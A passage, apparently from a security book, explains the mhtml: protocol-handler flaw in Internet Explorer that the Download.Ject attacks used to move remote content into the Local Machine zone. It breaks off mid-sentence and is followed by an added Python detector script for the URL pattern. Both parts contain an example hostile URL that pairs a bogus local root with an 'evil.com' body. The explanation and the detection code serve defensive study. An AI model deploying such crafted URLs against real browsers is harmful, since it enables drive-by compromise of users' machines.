Ject attacks was in the mhtml:
protocol handler. A protocol handler is code that handles protocols like http:, ftp:, and
rtsp:. Internet Explorer passes the URL following the protocol name to the protocol handler
to, well, handle. The mhtml: protocol URLs are of the following form:
"mhtml://ROOT-URL!BODY-URL", with the body URL being loaded into the Root URL.
However, the mhtml: protocol handler had a critical flaw that allowed a cross-zone elevation
from the Internet zone into the LMZ. If the ROOT-URL in the preceding syntax
was not reachable, IE would load only the BODY-URL, but would load that URL into
the same security zone where the ROOT-URL would have been loaded if it had existed.
More concretely, imagine what would happen given the vulnerable mhtml: protocol
handler loading this URL: "mhtml:file://c:/bogus.mht!http://evil.com/evil.html". The
ROOT-URL points to a file on the local file system. However, the attackers used a reference
that they knew would never exist. The ROOT-URL location could not be found, but IE still
navigates to the BODY-URL, unfortunately opened in the Local Machine zone where
the ROOT-URL was supposed to be loaded from. Whoops! In the case of Ibiza and
Download.Ject, this evil.
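
The URL shape described above (a local ROOT-URL paired with a remote BODY-URL) can be searched for in saved pages or proxy logs. The following is an added example, not code from the original text; the function names and the sample lines other than the URL quoted above are constructed for illustration. It flags the shape only and cannot tell whether the local file actually exists.

```python
import re

MHTML_RE = re.compile(r"mhtml:[^\s\"'<>]+", re.IGNORECASE)
SCHEME_RE = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*):")
REMOTE = {"http", "https", "ftp"}


def scheme_of(ref):
    """Return the lowercased scheme of a reference, or '' if it is relative."""
    m = SCHEME_RE.match(ref)
    return m.group(1).lower() if m else ""


def split_mhtml(url):
    """Split an mhtml: URL into (root, body); body is None without a '!'."""
    rest = url[len("mhtml:"):]
    if rest.startswith("//"):          # tolerate the mhtml://ROOT!BODY spelling
        rest = rest[2:]
    root, bang, body = rest.partition("!")
    return root, (body if bang else None)


def is_cross_zone(url):
    """True when a local ROOT-URL is paired with a remote BODY-URL."""
    root, body = split_mhtml(url)
    if body is None:
        return False
    s = scheme_of(root)
    local_root = s == "file" or len(s) == 1   # file: or a drive letter like c:
    return local_root and scheme_of(body) in REMOTE


def scan(lines):
    """Return (line_number, url) for every flagged mhtml: URL in the input."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in MHTML_RE.findall(line):
            if is_cross_zone(url):
                hits.append((n, url))
    return hits


# Constructed sample content; the first URL is the example from the text.
SAMPLE = [
    '<iframe src="mhtml:file://c:/bogus.mht!http://evil.com/evil.html">',
    '<img src="mhtml:file://c:/docs/saved.mht!image001.png">',
    '<a href="mhtml:http://intranet.example/report.mht!chart.gif">',
    '<a href="http://example.com/index.html">',
]
```

Calling scan(SAMPLE) reports only the first line; an archive that references its own embedded parts, or one fetched from a remote root, is left alone.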